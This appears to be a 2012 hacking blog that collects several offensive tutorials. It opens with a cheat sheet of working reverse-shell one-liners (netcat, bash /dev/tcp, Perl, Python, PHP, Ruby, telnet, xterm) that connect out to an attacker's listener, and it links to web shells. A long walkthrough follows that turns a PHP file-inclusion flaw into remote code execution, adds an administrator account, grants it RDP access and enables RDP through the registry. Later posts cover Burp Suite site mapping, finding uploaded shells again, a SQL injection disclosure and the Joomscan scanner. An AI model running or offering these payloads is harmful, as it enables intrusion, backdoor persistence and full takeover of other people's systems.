Friday, January 20, 2012

BIND & BACK CONNECT REFERENCE GUIDE

I previously gave you an introduction to NETCAT and how it can be used to do all kinds of neat things, especially for making connections. I showed you how it can be used to spawn a command shell while making BIND connections as well as BACK-CONNECT or REVERSE connections. In some cases your netcat attempts will simply fail for one reason or another, and you need to be prepared with a few alternative methods to still get the job done. A good friend of mine recently shared a list he put together from posts and comments scattered across the net. The list was so good I couldn't help but share it so others can benefit from it as well. Here are a few alternative methods you can try when the standard connections from your web based shells or netcat just don't seem to be working.

1. NETCAT with GAPING_SECURITY_HOLE enabled:
TARGET: nc 192.168.1.133 8080 -e /bin/bash
ATTACKER: nc -n -vv -l -p 8080

2. NETCAT with GAPING_SECURITY_HOLE disabled:
TARGET: mknod backpipe p && nc 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
ATTACKER: nc -n -vv -l -p 8080

3. Don’t have NETCAT? Then try the /dev/tcp socket method:
TARGET: /bin/bash -i > /dev/tcp/192.168.1.133/8080 0<&1 2>&1
ATTACKER: nc -n -vv -l -p 8080

4. Don’t have access to NETCAT or /dev/tcp? We can try using telnet and a backpipe to execute commands, like so:
TARGET: mknod backpipe p && telnet 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
ATTACKER: nc -n -vv -l -p 8080

5. Telnet – Plan B method using piped connections
TARGET: telnet 192.168.1.133 8080 | /bin/bash | telnet 192.168.1.133 8888
ATTACKER: nc -n -vv -l -p 8080
ATTACKER2: nc -n -vv -l -p 8888

6. Using straight BASH
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

7. Inline Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

8. Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

9. Inline PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

10. Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
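
NOTE: For methods 6 through 10 you still need a listener waiting on the attacking box to catch the shell, same as in the earlier examples – for instance:
ATTACKER: nc -n -vv -l -p 1234
(just adjust the IP/port in each one-liner to match wherever your listener is actually sitting)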

11. Using Xterm (if available)
xterm -display 10.0.0.1:1
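
For the xterm method you also need an X server on the attacking box willing to accept the incoming connection (display :1 listens on TCP port 6001). A minimal sketch, assuming 10.0.0.1 is your box and 10.0.0.2 is the target (both placeholder IPs, and depending on your distro you may need to explicitly allow TCP listening):
ATTACKER: Xnest :1
ATTACKER: DISPLAY=:1 xhost +10.0.0.2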

12. A few Web Shells that have some cool connection and bypassing features built into them:
·         Priv8-2012 – PHP web based shell which can be downloaded from packetstorm: http://packetstorm.igor.onlinedirect.bg/UNIX/penetration/priv8-2012-bypass-shell.txt
o   You might need to review the code for a backdoor near the top, be warned!
·         Php-findsock-shell – designed to bypass egress filtering, available here: http://pentestmonkey.net/tools/web-shells/php-findsock-shell
·         Weevely – avoids bind/reverse shells by providing a console over an HTTP communication channel, available here: http://www.garage4hackers.com/f11/weevely-stealth-tiny-php-backdoor-1002.html
·         WeBaCoo – (one of my favorites) – uses an HTTP communication channel and passes commands through a cookie parameter. You do need to chain commands due to the nature of it, as you can’t change directories; available here: http://packetstormsecurity.org/files/108009/webacoo-0.2.zip
Do you have another method which is not listed here? Please let me know by posting a comment or shooting me a message privately as we would like to build this up to be the best online reference out there.

If these methods don’t help you then I am not sure what will. I hope you find this information useful, and I hope that for at least one person it makes the difference between a mildly successful pentest and an all-out success! Until next time, Enjoy!

Special shout-out to CHEATSON for helping to put this reference material together in one spot!

Monday, January 16, 2012

BURP SUITE - Part VII: LFI Exploit via /PROC/SELF/FD

I have previously shown you several methods with which we can exploit LFI vulnerabilities, as well as general usage of the Burp Suite tool set. I have put together a brief video of one last method I wanted to share with you. The methods used all build upon the previous tutorials; only the location is new. We will take advantage of the system shortcuts made available by the /proc/self/fd directory. Once located, the file descriptor links can be enumerated to locate log files for a potential code injection vector. In the video I will show you an example of this method, sit back and enjoy....
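
If you want to poke at this manually before watching, the idea is simply to walk the file descriptor numbers through your LFI parameter until one of the symlinks turns out to be an open log file you can poison (the parameter name and site below are just placeholders for illustration):

                http://www.targetsite.com/index.php?page=/proc/self/fd/2
                http://www.targetsite.com/index.php?page=/proc/self/fd/3

...and keep incrementing the number until something interesting comes back.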

VIDEO:


HR's BURP SUITE PACK - DOWNLOAD (NEW LINK):  http://uppit.com/6fj3c4vxi4xk/HR-BURP-PACK_1.23.12.rar

Tuesday, January 10, 2012

BURP SUITE - Part VI: More Fun Exploiting LFI with PHP:// Filters


OK, previously I have shown you a few ways you can exploit LFI vulnerabilities. We covered how to gain shell access through /proc/self/environ, how to read source through php://filters, and also how to gain command execution through the log poisoning technique. Today I am going to show you one last method which is much less well known and even less documented: how we can exploit LFI vulnerabilities by abusing the php://input filter. The php://input filter is designed to handle the data from a POST request as its argument. If you look it up in the PHP manual you will find it described as: (php://input) “is a read-only stream that allows you to read raw data from the request body. In the case of POST requests, it is preferable to use php://input instead of $HTTP_RAW_POST_DATA as it does not depend on special php.ini directives”. We will abuse this feature to execute PHP code thanks to the include() vulnerability we are exploiting (in similar fashion to how the /proc/self/environ method works). I have seen this method included in a few tools, and I will admit I had to tear FIMAP apart to truly figure out how it was getting this technique to work, which is why I want to share it with everyone – I assume I am not the only one who was unaware of this technique and how it can be used to successfully turn Local File Inclusion (LFI) into Remote Code Execution (RCE), most notably, but certainly not limited to, on Windows targets. I will show you how it works using Burp Suite so you can more clearly see how the requests are formed and the code injected manually, here goes…

Pre-requisites:
·         LFI Vulnerability
·         Burp Suite, cURL, Tamper Data, Live HTTP Headers, or some other means to easily make POST requests and control the data sent with it – I will be using Burp Suite for this write up and curl in the bonus video. If you need help in coming up to speed with Burp Suite you might want to check out some of my other tutorials I have done:
·         Updated HR’s Burp Pack Download, available here: http://www.megaupload.com/?d=LP7Z7E2K
·         A Brain :)

OK, so today I will be using this method against a Windows target to show you that LFI vulnerabilities can be abused on Windows just as badly as they can be on a *nix machine – just because we can’t find /etc/passwd doesn’t mean we can’t get things going, watch and learn my friends. I will assume after all my previous LFI coverage that you can spot a potential LFI by now and know what to look for. We will start from the initial find and work our way to command execution:

OK, our initial request for /etc/passwd fails but gives us a few clues that we are up against a Windows machine. This means the /proc/self/environ method is out. You can use “C:\boot.ini” or “C:\WINDOWS\win.ini” as the universal Windows equivalent of /etc/passwd for a simple LFI base file check:
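
To make that concrete, the check is nothing more than swapping the requested file in your vulnerable parameter (the parameter name and site here are just placeholders):

                http://www.targetsite.com/index.php?page=C:\boot.ini
                http://www.targetsite.com/index.php?page=C:\WINDOWS\win.ini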

We can then try to find juicy Windows files using my new LFI-WinblowsFileCheck.txt file, which I added to my Burp Suite download pack (link available at the top and bottom of this tutorial). My new list is especially helpful when the target is also known to be running under a XAMPP setup, as I set XAMPP up locally and tested until I had every possible file I could think of that might give up juicy info.

In this scenario I was able to find several juicy files which held helpful information, but alas I was not able to successfully gain access to any of the log files. The apache log files caused errors to be thrown, which made them unusable, and the FTP & Mail log files appear to be on another drive which I can’t successfully access through the LFI. I can use the php://filters method to read source code, but alas I can only find a few PHP pages on the site and can’t seem to locate any low hanging fruit by guessing for configuration files :(


Do we give up and move on to the next site? Hell no! We never give up and we leave no stone unturned! Since we can use php://filters to read source code, we will now try one last trick and see if we can abuse another filter which I have yet to introduce you to, and that is the php://input filter. This filter is designed to handle data sent via POST request, and when we abuse it through our include() vulnerability we can exploit the conditions to turn our LFI into full RCE, or Remote Code Execution! In order to get things working we flip our request from a GET request to a POST request. We then replace the file name we have been requesting with php://input and place our code below the other header info so it becomes the data read by php://input.

Mini-TuT: 101 on GET vs. POST requests, because you need to understand how to flip the request properly or it won’t work correctly; here is the minimum you need to understand to get started:
HTTP is a request-response protocol with several built-in methods which allow it to make all types of requests. The two most common of those methods are GET and POST, and they are all I will focus on for now...

A GET request fetches data from the web server. Here's an example request:

                GET /index.html?username=joesomebody&passwd=supersecret HTTP/1.1
                Host: www.samplesite.com
                User-Agent: Mozilla/4.0

You don’t need to include anything else, as everything for the GET request is in the URL itself and the header details. This is where the difference becomes notable, as POST requests do send additional data to the web server. Here is an example of a POST request:

                POST /login.php HTTP/1.1
                Host: www.samplesite.com
                User-Agent: Mozilla/4.0
                Content-Length: 39
                Content-Type: application/x-www-form-urlencoded

                username=joesomebody&passwd=supersecret

You can clearly see a difference in the structure of the request. We use POST instead of GET, with the URL pointing to the page we want to send our data to. We then have our Host header to identify the target site, so that when paired with the URL path we get a working link. The User-Agent field is fairly self-explanatory, although it is worth mentioning you can spoof it or even use it to inject code in some cases (see some of my other LFI tutorials for examples). We then define the Content-Length, which is a count of the characters in our data stream. The Content-Type should be set to the default application/x-www-form-urlencoded, followed by a blank line and then the data you want to send. POST requests typically alter something on the web server, whereas GET requests do not.

Back to the main TuT…

As in many of my other tutorials I like to start small and then work our way up to full shell access, so we begin by checking to see if we can use injected code to echo some text to the page (Hood3dRob1n in this case); your request should look similar to this:
NOTE: we use the PHP chr() function to send ASCII characters one at a time for the echo command
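
For reference, here is a rough sketch of what that request can look like in raw form – the page parameter, host, and exact payload are placeholders for your own target, and the Content-Length has to be counted to match whatever body you actually send (108 matches the example body below):

                POST /index.php?page=php://input HTTP/1.1
                Host: www.targetsite.com
                User-Agent: Mozilla/4.0
                Content-Length: 108
                Content-Type: application/x-www-form-urlencoded

                <?php echo chr(72).chr(111).chr(111).chr(100).chr(51).chr(100).chr(82).chr(111).chr(98).chr(49).chr(110); ?>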

OK, we can clearly see our text being displayed, meaning our echo command was successfully injected. Again, this works because php://input takes the POST data as its argument, and since we are inside the include() vulnerability the code becomes executable. We can now modify the request to inject whatever code we like; just remember in this case it is a Windows environment, so commands need to be adjusted accordingly. We can quickly check our user status by issuing a quick “whoami” request, like so:
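
Same request as above, only the body changes (along with the Content-Length) – something along the lines of:

                <?php system('whoami'); ?>

(or shell_exec()/passthru() if system() happens to be disabled on the box)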

As you can see, we are running in this case as the NT AUTHORITY\SYSTEM user, which is the Windows equivalent of the root user. Now we can issue a systeminfo command to see what we have gotten into:

And then follow up with DIR commands and take a look around…

Now since it is a Windows machine we may or may not be able to use WGET or CURL to pull a shell onto the target site. If we can’t, we will try to use our RCE ability to add a user and then use RDP to simply log in and do our thing. In this scenario I can’t load a shell, so we will do it the long way. We first check to see who is in the administrators group already with a quick Windows command:
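
The group check itself is just the standard Windows command, pushed through our php://input injection the same way as whoami:

                net localgroup administrators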

OK, so now we need to get our name on the list. We use some more Windows command line kung-fu and add a user to the machine, like so:
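
The classic add-a-user one-liner – the username and password here are made up, so pick your own:

                net user hackerman P@ssw0rd1 /add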

Now we check the user list once more to confirm our new account made it on:

w00t – our new user made the list! OK, we are almost done… now that we have our user created we will grant them access to the Remote Desktop Users group so we can use RDP to get full GUI access to the site. In order to do this we alter our commands slightly and add our new user to the group, like so:
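
Sticking with the made-up “hackerman” account from above, that looks like:

                net localgroup "Remote Desktop Users" hackerman /add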

Now that we have added the user to the RDP group, we need to add them to the administrators group so we can get on the cool guy list; we do this by adjusting our command slightly, as so:
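
Again using the placeholder account name:

                net localgroup administrators hackerman /add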


OK, now we need to open up a command prompt or terminal on our local machine and issue a quick PING request to the target site so we can confirm the IP address we will RDP into. It should appear something similar to the following (the point is just to get the site’s IP):
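
Nothing fancy here (the site name is a placeholder) – the reply lines hold the IP address you will point RDP at:

                ping www.targetsite.com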


 Once we have the IP address for our Windows target we can simply open up our RDP connection manager and connect using our new account credentials we made in the steps outlined above:


At this point you have pretty much got full control, thanks to wonderful old Windows. If things fail due to the RDP service not being enabled, you can try to inject a command to enable it:
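
One common way to do that (a sketch only – push it through the same RCE, and on some boxes the service still needs a kick or a reboot before it takes effect) is flipping the Terminal Server deny flag in the registry:

                reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f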



And if you’re too impatient you can simply restart the machine yourself, although this may cause a few red flags to go off and could possibly lead to data loss on the remote target, so use it with some caution…

You can use your RDP GUI access to do what you want now, or you can do it all through the LFI command execution one request at a time, whatever floats your boat. This sums up my coverage of the LFI php://input filter technique and how it can be used to exploit Windows systems (it can also be used against *nix, but I mainly employ this technique against Windows targets). I hope you have enjoyed this tutorial, and as always, until next time – Enjoy!

BONUS VIDEO:
...I should have up in next 24hrs...

Updated HR’s Burp Pack Download, available here: http://www.megaupload.com/?d=LP7Z7E2K

Monday, January 9, 2012

BURP SUITE - PART V: MAPPING THE TARGET

Today I will give you a quick overview of how you can map the web infrastructure of a target website using the tools built into Burp Suite. I probably should have covered this in the beginning, as it is a fairly basic task; however, I seem to get a lot of questions on it, so here we are. We will be focusing on the Target & Spider tabs for this tutorial. I will lay down the steps from setup to run and try to keep it in the usual easy-to-follow format, here goes…

We will start off as usual by configuring our browser to use a proxy on localhost (127.0.0.1) pointed at port 8080, unless you have changed the default settings for Burp to listen on another port (as I have in the example below – using 8181 since apache is already running on 8080).


Once our browser is properly configured we can fire up Burp Suite by double clicking the jar file. Now we can start capturing our requests from the browser and playing with them within Burp. I like to turn the Interceptor off on the Proxy tab so all requests flow as normal and can be easily picked up on the proxy history tab if/when needed. In order to map the target site we first need to fire a request in our browser to the root directory of the site (i.e. http://www.targetsite.com/). Once it has run, we pick it up in Burp and get ready to start mapping things. Navigate to the proxy history tab to review the actual request that was sent, then right click on the request and choose “add item to scope”. In doing this we define it as one of our target sites.


I know you can see the “spider from here” option and I know it is tempting to jump ahead, but if you want clear and easy-to-interpret results then hang tight for just one minute... Now that we have added the target site to our in-scope items, we will further define our spider and target settings for best results. We start with the Scope sub-tab under the Target tab. Here we can define what is to be considered in-scope. If you’re working on multiple sites, or if you know two domains are linked, you can add them here as needed. This will be used to help us filter the results from all of the other sites which get drawn in while crawling & spidering due to ads, photos, etc. You can add them as outlined above, or you can copy and paste your URL links directly into this tab as needed. I should also call out that you can define items to exclude from being considered in-scope. This is helpful in avoiding pages which might cause the crawler/spider to be logged out and thus result in incomplete results. The default settings are fine, but this is where you can go in those pesky situations to help fine tune things.

NOTE: the sitemap sub-tab is where all of the results will be presented once the crawling/spidering begins; hang tight and we will come back to that one in a bit…

OK, now that we have defined our scope we need to set the options for our crawler and its spidering results. These options define how the crawling is done, how forms are handled, etc. In the first half of the options you can define some general settings, like checking the robots.txt file for added info or the crawl depth to use. You can also define how forms are handled in this upper half. This allows you to fill out some basic info once and have it submitted automatically for you; any time the crawler comes across a form it will use smart matching to fill it in as best it can. You can also have it ignore forms altogether, or go into interactive mode and have it prompt you for action on every form it comes across. If the crawler has valid credentials it will obviously get a more in-depth scan with more accurate results, so if you have proper credentials enter them here. Just remember that what you submit may show up in a report or in the logs, so you may want to change the defaults if you’re on a paid gig ;)



NOTE: If you have a password protected shell uploaded to a site and you can’t seem to find it, the “prompt for guidance” application login option is a good way to quickly find the link to your missing shell, as you can check the links as they are found for authorization pages and then manually inspect to see if one of them is your shell (it works for me with a high degree of success!).

The lower half of the options tab allows you to set the speed at which the spider engine runs. Please be aware of your own system limitations before adjusting the thread count too high – the default settings seem to run fairly effectively in most cases. You can also set header level information to be carried in the requests made while crawling, as well as unticking the HTTP/1.1 box to force communication over the older, less supported standard.




OK, now that we have everything properly set up for our scan, we make one last edit which will make a huge difference in our results and how easy they are to interpret. We go to the Target tab and the Sitemap sub-tab to activate our filters. You need to click on the grey area at the top, which will expand when you click on it. In the filters section you can have it sort the results to your liking (server response codes, MIME types, file type, only parameterized requests – for you injectors out there, etc.). I like to set up the filters as I like them, but the biggest and most important one is showing only in-scope items. This will block out the extra waste. If you don’t believe me, try it without the filters and then again with filters to see how big a difference this small task makes.

It should appear as follows once the filters menu is expanded:


SPECIAL SIDE NOTE: If you want to save the requests and/or responses from any session, you need to define this from the start by clicking on the Options tab and then the Misc. sub-tab. Here you can choose to log requests, responses, or both. This is helpful if you want to manually review things after your work, or if you want to pass the log results to another tool such as SQLMAP to be parsed for possible SQL injection vulnerabilities. If you choose to log anything it will prompt you to name the log file as well as define the location for storage.
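
For example, SQLMAP can parse a saved Burp proxy log directly with its -l option (the log filename here is just whatever you chose when you enabled logging):

                ./sqlmap.py -l burp_requests.log --batch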


This should get you all set up. We now go back to the Target tab and the Sitemap sub-tab, where you will now see just your target site; right click on it and choose the “Spider this host” option to launch the crawling and spidering process.


Now you sit back and wait for a few minutes while the Burp spider does its thing. You can check the status of the current crawling/spidering session on the Spider tab, Control sub-tab:


In order to see the final results simply navigate back to the Target tab and the Sitemap sub-tab and you will see all of the found links on the left hand side. You can expand folders and dynamic pages to see what is within them or what options can be passed. You can also see a list of the URL links in the right hand area as shown below:


The example above is rather simple in nature, but this is an easy way for you to get a feel for what a site has going on. You can play with the options and the filters to see how they change the results provided and customize them to fit your needs (for example, in some cases you may want to trace what other sites are being communicated with to see if you can exploit trust relationships, and therefore might not want to filter any results in the sitemap sub-tab so that you can see everything linked). That sums up my brief overview of how you can use Burp Suite to map out a site’s infrastructure in a quick and easy manner. You can use the options to your advantage to find authentication forms, lost shells you might have uploaded, or just to get a better picture of what you’re up against. I encourage you to continue playing around with Burp Suite and all the tools it has to offer. I will keep working on new material to share with you on how we can squeeze more usefulness out of the Burp Suite tools, until next time – Enjoy!

PS - my apologies for not including these details earlier in the series; for those who felt I left it out, you should now have everything you need to get started and on your way with the basics :)

MangosWeb SQL Vulnerability - My First 0day!

I was doing an assessment for a friend on his new site and I discovered a SQL POST injection vector via the login form being used in the CMS he had chosen. I worked my way through the site in my usual fully detailed approach, and when I was done I thought to myself – why is it vulnerable? I checked the CMS he was running and then decided to use the power of Google to see if I could find any other sites using the same software. I soon found a working dork which produced a ton of results and, lo and behold, the injection vector seemed to be present on almost all of the sites I came across. I had to play with the injection syntax to come up with a few universals, but I am happy to say that my work was published to the exploit-db and 1337day exploit database sites – made my year already!

Here are the links to the full details on the exploit:
Exploit-DB: http://www.exploit-db.com/exploits/18335/
1337day: http://www.1337day.com/exploits/17350

The point here is to always keep your eyes and ears open, as you never know what you might stumble across. If you find a vulnerability in one site, check to see whether you found a site-specific bug or an actual software bug which affects multiple sites rather than a single site instance. The power of Google is amazing, and this goes to show hard work does pay off. I am excited and just wanted to share with everyone else who might be following my blog. Please check back soon as I have several new tuts in the works and should have new content up very shortly. Until next time, Enjoy!

Monday, January 2, 2012

Joomscan! A Quick way to audit Joomla installs

Today I will briefly introduce you to a tool that has been under development for a while now thanks to OWASP. I bring to you: Joomscan! This is a Perl script which is capable of scanning your Joomla site for common misconfigurations and vulnerabilities. It doesn’t magically exploit them, but it can be a quick way to analyze a site’s security, and we all know Joomla has its share of problems despite being so popular and easy to use.

In order to get started you will need to first download joomscan.pl from the main OWASP project download page hosted on Source Forge: http://sourceforge.net/projects/joomscan/files/

You will need to edit lines 62 & 63 of the joomscan.pl file so the full path location points to the actual file location, otherwise you will experience errors immediately when running it (right after the EULA acceptance and the firewall scan):

Once set up properly we can run the Perl script with the -u argument followed by our target site and let it rip (you can ignore the update request and still run just fine):
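
In its simplest form that looks like this (the target URL is a placeholder):

COMMAND: perl joomscan.pl -u http://www.site.com
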
...

...

...
NOTE: It will beep upon completion so don’t be alarmed :p  

A few additional arguments which can be used:
-          We can quickly check the version running and exit by using the “-pe” argument
-          We can run the request through a proxy using the “-x proxy:port” argument
-          We can log all of the output to a file for review afterwards by adding either the “-ot” or “-oh” arguments which will output in either text or html format.
o   This flag needs to be placed first and before any others to work properly.
o   The text version emulates the terminal results while the HTML output is very clean and presentable (my preference)

COMMAND: joomscan.pl -oh -u http://www.site.com -pe

The output option does not work unless you make it the first argument, so make sure your order is right – it took me a few passes to finally figure that bug out. The results of the scan will be saved in the “/report” folder with a filename of “www.target-site-joexploit” (.txt/html); simply open it up to review or present as needed. The text output is pretty much a mirror of the terminal results, while the html output is something you can actually present to someone with little modification (good for assessments and/or upgrade budget requests). Here are a few quick screenshots:

PRETTY GRAPHS:

PRETTY DETAILED RESULTS:

There is not much more to this tool; it doesn’t test the vulnerabilities it finds, so you need to follow up manually from here. I just wanted to highlight this tool for those who may be unaware of it. It allows you to quickly assess your Joomla! site for common misconfigurations and vulnerabilities which could lead to hackers exploiting your site.

Stay patched and until next time – Enjoy!